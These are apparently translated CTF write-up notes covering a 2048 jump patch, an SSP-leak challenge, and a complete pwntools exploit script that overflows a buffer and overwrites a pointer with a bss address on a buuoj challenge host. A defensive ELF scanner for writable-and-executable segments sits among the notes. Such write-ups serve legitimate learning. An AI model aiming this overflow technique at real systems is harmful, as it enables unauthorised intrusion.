0x01 2048 (jk出发)
Patch the conditional jump to a nop, then any move prints the flag directly. I had imagined this scenario for a long time but never pulled it off; this time I followed the writeup, got it working, and now know how it is done. Learned something!
0x02 four (dsactf)
Use vmmap to check segment permissions; the bss segment shows up there! I had no idea you could do this before!!
The SSP leak technique, which I had never learned, I learned this time. Note the address of the argv input, note the address where the read starts, and the difference gives the offset; with that you can do the SSP leak, which is the key point. Newer glibc versions fixed it, but that does not matter; that is where the fun is.
The arguments can be seen in __stack_chk_fail.
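The vmmap observation above (a bss segment with unexpected permissions) can be checked statically before a binary is ever run. The following is an added example, not part of the writeup or the challenge: it parses the program header table of a little-endian ELF64 image with only the Python standard library, reports every PT_LOAD segment that is both writable and executable, and reports whether PT_GNU_STACK leaves the stack executable. The ELF image it scans is constructed inline (headers only, no code), and the addresses and sizes in it are made up for the example.

```python
import struct
import sys

# ELF64 constants from the ELF specification
PF_X, PF_W, PF_R = 1, 2, 4
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551


def parse_program_headers(data):
    """Parse the program header table of a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", data, 32)          # e_phoff
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)  # e_phentsize, e_phnum
    headers = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        # Elf64_Phdr: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        p_type, p_flags, _, p_vaddr, _, _, p_memsz, _ = struct.unpack_from("<IIQQQQQQ", data, off)
        headers.append({"type": p_type, "flags": p_flags, "vaddr": p_vaddr, "memsz": p_memsz})
    return headers


def perm_string(flags):
    """Render p_flags the way vmmap does: rwx / r-x / rw- ..."""
    return ("r" if flags & PF_R else "-") + ("w" if flags & PF_W else "-") + ("x" if flags & PF_X else "-")


def find_wx_segments(data):
    """Return (vaddr, memsz, perms) for every PT_LOAD segment that is writable AND executable."""
    return [(h["vaddr"], h["memsz"], perm_string(h["flags"]))
            for h in parse_program_headers(data)
            if h["type"] == PT_LOAD and h["flags"] & PF_W and h["flags"] & PF_X]


def stack_is_executable(data):
    """The stack is executable when PT_GNU_STACK is absent or carries PF_X (e.g. linked with -z execstack)."""
    for h in parse_program_headers(data):
        if h["type"] == PT_GNU_STACK:
            return bool(h["flags"] & PF_X)
    return True


def build_test_elf(segments):
    """Constructed ELF64 header plus program headers only (no code), for offline testing.
    segments: list of (p_type, p_flags, p_vaddr, p_memsz)."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8      # ELFCLASS64, little-endian
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH",
                                 2, 0x3E, 1, 0x400000,           # ET_EXEC, x86-64, version, entry
                                 64, 0, 0,                       # e_phoff right after the header, no sections
                                 64, 56, len(segments), 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, v, v, 0, m, 0x1000) for t, f, v, m in segments)
    return ehdr + phdrs


# Constructed sample: an r-x text segment, an rwx bss-style segment, and a non-executable stack marker.
SAMPLE_WX = build_test_elf([
    (PT_LOAD, PF_R | PF_X, 0x400000, 0x1000),
    (PT_LOAD, PF_R | PF_W | PF_X, 0x601000, 0x2000),
    (PT_GNU_STACK, PF_R | PF_W, 0, 0),
])

if __name__ == "__main__":
    # Pass a real binary path as argv[1]; otherwise scan the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_WX
    for vaddr, memsz, perms in find_wx_segments(data):
        print(f"W+X segment at {vaddr:#x} size {memsz:#x} ({perms})")
    print("executable stack:", stack_is_executable(data))
```

A W+X PT_LOAD segment is the static counterpart of what vmmap shows at runtime; if the scanner reports one, or reports an executable stack, the binary was built without the usual NX hardening and is worth a second look before deployment.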
from pwn import *

p = process("./pwn")
if args.P:
    p = remote('node4.buuoj.cn', 25603)
context.terminal = ['tmux', 'splitw', '-h']
if args.G:
    gdb.attach(p)

# Option 2: the "no overflow" input; the supplied length reaches 0x5FF0-1
p.sendlineafter('your choice :', b'2')
p.sendlineafter('You can give any value, trust me, there will be no overflow', str(0x5FF0 - 1))
# 0x5de0 bytes of padding, then the string "flag" with its terminator
payload = b'N' * 0x5de0 + b'flag\x00'
p.sendlineafter('Actually, this function doesn\'t seem to be useful', payload)
p.sendlineafter('Really?', b'y')

# Option 3: walk through the prompts; the filename written here is output.txt
p.sendlineafter('your choice :', b'3')
p.sendlineafter('Enter level:', b'3')
p.sendlineafter('Enter mode:', b'3')
p.sendlineafter('Enter X:', b'3')
p.sendlineafter('Enter a string:', b'3')
p.sendlineafter('please input filename', b'output.txt')
p.sendlineafter('1. yes\n2.no', b'2')

bss = 0x602323  # address inside the bss segment (seen with vmmap)

# Option 4: info input, then the final overwrite
p.sendlineafter('your choice :', b'4')
payload = b':`##>@a*>~3'
p.sendlineafter('info>>', payload)
p.sendline(b'5')
# cyclic pattern used to find the 0x118 offset in front of the target pointer
#payload = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaab' + p64(bss)
# 8 + 0x110 bytes of padding, then the bss address
payload = b'YYYYYYYY' + b'N' * 0x110 + p64(bss)
p.send(payload)
Got the flag.